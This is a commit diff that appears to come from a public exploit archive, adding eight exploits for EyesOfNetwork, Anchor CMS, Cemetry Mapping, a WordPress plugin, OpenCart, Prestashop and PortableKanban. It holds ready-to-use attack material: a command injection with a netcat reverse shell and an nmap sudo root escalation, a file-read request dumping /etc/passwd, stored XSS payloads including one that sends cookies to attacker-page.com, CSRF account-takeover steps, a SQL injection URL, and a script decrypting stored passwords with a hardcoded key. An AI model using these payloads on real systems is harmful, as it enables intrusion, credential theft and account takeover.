DB: 2021-01-12

9 changes to exploits/shellcodes PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval EyesOfNetwork 5.3 - RCE & PrivEsc Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting EyesOfNetwork 5.3 - LFI Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) OpenCart 3.0.36 - ATO via Cross Site Request Forgery Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
2021-01-12 05:01:58 +00:00 · 2021-01-12 05:01:58 +00:00 · 66f2f8c3b5
commit 66f2f8c3b5
parent 206c9f4f7e
10 changed files with 302 additions and 0 deletions
--- a/exploits/multiple/dos/49283.txt
+++ b/exploits/multiple/dos/49283.txt
@ -5,6 +5,7 @@
 # Software Link: https://nxlog.co/products/nxlog-community-edition/download
 # Version: 2.10.2150
 # Tested on: Linux Debian 10 && Windows Server 2019
+# CVE: CVE-2020-35488

 #!/usr/bin/python3

--- a/exploits/multiple/webapps/49402.txt
+++ b/exploits/multiple/webapps/49402.txt
@ -0,0 +1,26 @@
+# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
+# Date: 10/01/2021
+# Exploit Author: Audencia Business SCHOOL Red Team
+# Vendor Homepage: https://www.eyesofnetwork.com/en
+# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
+# Version: 5.3
+
+#Authentified Romote Code Execution flaw > remote shell > PrivEsc
+#
+#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.
+
+==============================================
+Initial RCE
+
+In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php
+
+The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like : 
+
+& nc -e /bin/sh <IP> <PORT>
+==============================================
+PrivEsc
+
+The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
+ 
+echo 'os.execute("/bin/sh")' > /tmp/nmap.script
+sudo nmap --script=/tmp/nmap.script
--- a/exploits/multiple/webapps/49403.txt
+++ b/exploits/multiple/webapps/49403.txt
@ -0,0 +1,62 @@
+# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
+# Date: 2021-10-01
+# Exploit Author: Ramazan Mert GÖKTEN
+# Vendor Homepage: anchorcms.com
+# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
+# Affected Version: [ 0.12.7 ]
+# Tested on: Windows 10
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: markdown
+# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>
+
+# Description
+
+Exploitation of vulnerability as shown below;
+
+1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin )
+2-) Click Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts " to "vulnerableapplication.com/anchor/admin/posts/add " )
+3-) Relevant payload (<script>prompt("RMG_XSS_PoC")</script>) which was defined above entering the markdown parameter then click "save" button
+4-) Finally, turn back the home page then shown the triggered vulnerability
+
+# Proof of Concepts:
+
+Request;
+
+POST /anchor/admin/posts/add HTTP/1.1
+Host: vulnerableapplication.com
+Connection: close
+Content-Length: 234
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: https://vulnerableapplication.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://vulnerableapplication.com/anchor/admin/posts/add
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9
+Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1;
+_ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1
+
+token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false
+
+Response;
+
+HTTP/1.1 200 OK
+Date: Sun, 10 Jan 2021 12:50:51 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+X-Robots-Tag: noindex,nofollow
+Connection: close
+Content-Type: application/json; charset=UTF-8
+Content-Length: 105
+
+{"id":"3","notification":"Your new article was
+created","redirect":"\/anchor\/admin\/posts\/edit\/3"}
--- a/exploits/multiple/webapps/49404.txt
+++ b/exploits/multiple/webapps/49404.txt
@ -0,0 +1,75 @@
+# Exploit Title: EyesOfNetwork 5.3 - LFI
+# Date: 10/01/2021
+# Exploit Author: Audencia Business SCHOOL Red Team
+# Vendor Homepage: https://www.eyesofnetwork.com/en
+# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
+# Version: 5.3
+
+The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :
+
+==================================================================
+POST /module/tool_all/select_tool.php HTTP/1.1
+Host: 192.168.0.26
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 209
+Origin: https://192.168.0.26
+Connection: close
+Referer: https://192.168.0.26/module/tool_all/
+Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1
+
+(tool_list=FILE TO READ)
+page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=
+
+==================================================================
+
+
+Result a printed /etc/passwd document in the webpage : 
+
+==================================================================
+
+HTTP/1.1 200 OK 
+Date: Sat, 09 Jan 2021 01:16:21 GMT 
+Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 
+X-Powered-By: PHP/5.4.16 
+Content-Length: 1529 
+Connection: close 
+Content-Type: text/html; charset=UTF-8 
+ 
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+nagios:x:999:991::/var/spool/nagios:/sbin/nologin
+influxdb:x:998:998::/var/lib/influxdb:/bin/false
+systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
+mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
+grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin
+polkitd:x:996:994:User for polkitd:/:/sbin/nologin
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin
+rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
+postfix:x:89:89::/var/spool/postfix:/sbin/nologin
+chrony:x:994:990::/var/lib/chrony:/sbin/nologin
+tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
+cacti:x:1000:991::/home/cacti:/bin/bash
+eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+admin:x:1002:1000:admin:/home/admin:/bin/bash
+
+==================================================================
--- a/exploits/php/webapps/49405.txt
+++ b/exploits/php/webapps/49405.txt
@ -0,0 +1,38 @@
+# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
+# Exploit Author: Mesut Cetin
+# Date: 2021-01-10
+# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: 1.0
+# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34 
+
+Affected parameter: "full name", "location"
+
+Proof of concept:
+
+1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
+2. Click on "Deceased Persons"
+3. Choose one of the users and click on their names to edit it
+4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
+5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
+6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>
+
+To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:
+
+POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 149
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
+Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
+Upgrade-Insecure-Requests: 1
+
+PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=
+
+And forward the request. The cookie values will be displayed on screen.
--- a/exploits/php/webapps/49406.txt
+++ b/exploits/php/webapps/49406.txt
@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
+# Google Dork: NA
+# Date: 09/01/2021
+# Exploit Author: Swapnil Subhash Bodekar
+# Vendor Homepage:
+# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
+# Version: 1.0.5
+# Tested on Windows
+
+How to reproduce vulnerability:
+
+1. Install WordPress 5.6
+2. Install and activate Custom Global variables plugin.
+3. Navigate to Setting >> Custom Global Variables and enter the data into the user input field.
+4. Capture the request into burp suite and append the JavaScript payload which is mentioned below 
+"><script>(1)</script><"
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
--- a/exploits/php/webapps/49407.txt
+++ b/exploits/php/webapps/49407.txt
@ -0,0 +1,17 @@
+# Exploit Title: OpenCart 3.0.36 - ATO via Cross Site Request Forgery
+# Date: 01-09-2021
+# Exploit Author: Mahendra Purbia {Mah3Sec}
+# Vendor Homepage: https://www.opencart.com
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: OpenCart CMS - 3.0.3.6
+# Tested on: Kali Linux
+
+#Description:
+OpenCart CMS 3.0.3.6 & below versions are vulnerable to Account takeover via CSRF, related to the endpoint /account/edit.
+
+Steps to Reproduce:
+1. create accounts a. victim & b. Attacker (attacker account is just for fetch the request and create a CSRf POC)
+2. Now login with Attacker account and then go to account/edit and change the email and intercept this request in repeater, now create a CSRF POC of that request.
+3. now in that poc change the email and email which is not registered {attacker another email}. Now save this request as a .html file.
+4. now send this POC to the victim. and then the victim opens that file automatically all information is changed like name, email etc.
+5. now attacker access account (with help of forgot password which came on attacker email) and fetch victim all information.
--- a/exploits/php/webapps/49410.txt
+++ b/exploits/php/webapps/49410.txt
@ -0,0 +1,14 @@
+# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
+# Date: 08-01-2021
+# Exploit Author: Jaimin Gondaliya
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://www.prestashop.com/en/download
+# Version: Prestashop CMS - 1.7.7.0
+# Tested on: Windows 10
+
+Parameter: id_product
+
+Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)
+
+Exploit:
+http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
--- a/exploits/windows/local/49409.py
+++ b/exploits/windows/local/49409.py
@ -0,0 +1,44 @@
+# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
+# Date: 9 Jan 2021
+# Exploit Author: rootabeta
+# Vendor Homepage: The original page, https://dmitryivanov.net/, cannot be found at this time of writing. The vulnerable software can be downloaded from https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
+# Software Link: https://www.softpedia.com/get/Office-tools/Diary-Organizers-Calendar/Portable-Kanban.shtml
+# Version: Tested on: 4.3.6578.38136. All versions that use the similar file format are likely vulnerable.
+# Tested on: Windows 10 x64. Exploit likely works on all OSs that PBK runs on. 
+
+# PortableKanBan stores credentials in an encrypted format
+# Reverse engineering the executable allows an attacker to extract credentials from local storage
+# Provide this program with the path to a valid PortableKanban.pk3 file and it will extract the decoded credentials
+
+import json
+import base64
+from des import * #python3 -m pip install des
+import sys
+
+try:
+	path = sys.argv[1]
+except:
+	exit("Supply path to PortableKanban.pk3 as argv1")
+
+def decode(hash):
+	hash = base64.b64decode(hash.encode('utf-8'))
+	key = DesKey(b"7ly6UznJ")
+	return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')
+
+with open(path) as f:
+	try:
+		data = json.load(f)
+	except: #Start of file sometimes contains junk - this automatically seeks valid JSON
+		broken = True
+		i = 1
+		while broken:
+			f.seek(i,0)
+			try:
+				data = json.load(f)
+				broken = False
+			except:
+				i+= 1
+			
+
+for user in data["Users"]:
+	print("{}:{}".format(user["Name"],decode(user["EncryptedPassword"])))
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11244,6 +11244,7 @@ id,file,description,date,author,type,platform,port
 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
 49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
+49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43608,3 +43609,10 @@ id,file,description,date,author,type,platform,port
 49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
 49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
 49401,exploits/php/webapps/49401.rb,"Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
+49402,exploits/multiple/webapps/49402.txt,"EyesOfNetwork 5.3 - RCE & PrivEsc",2021-01-11,"Audencia Business SCHOOL Red Team",webapps,multiple,
+49403,exploits/multiple/webapps/49403.txt,"Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting",2021-01-11,"Ramazan Mert GÖKTEN",webapps,multiple,
+49404,exploits/multiple/webapps/49404.txt,"EyesOfNetwork 5.3 - LFI",2021-01-11,"Audencia Business SCHOOL Red Team",webapps,multiple,
+49405,exploits/php/webapps/49405.txt,"Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting",2021-01-11,"Mesut Cetin",webapps,php,
+49406,exploits/php/webapps/49406.txt,"WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-01-11,"Swapnil Subhash Bodekar",webapps,php,
+49407,exploits/php/webapps/49407.txt,"OpenCart 3.0.36 - ATO via Cross Site Request Forgery",2021-01-11,"Mahendra Purbia",webapps,php,
+49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,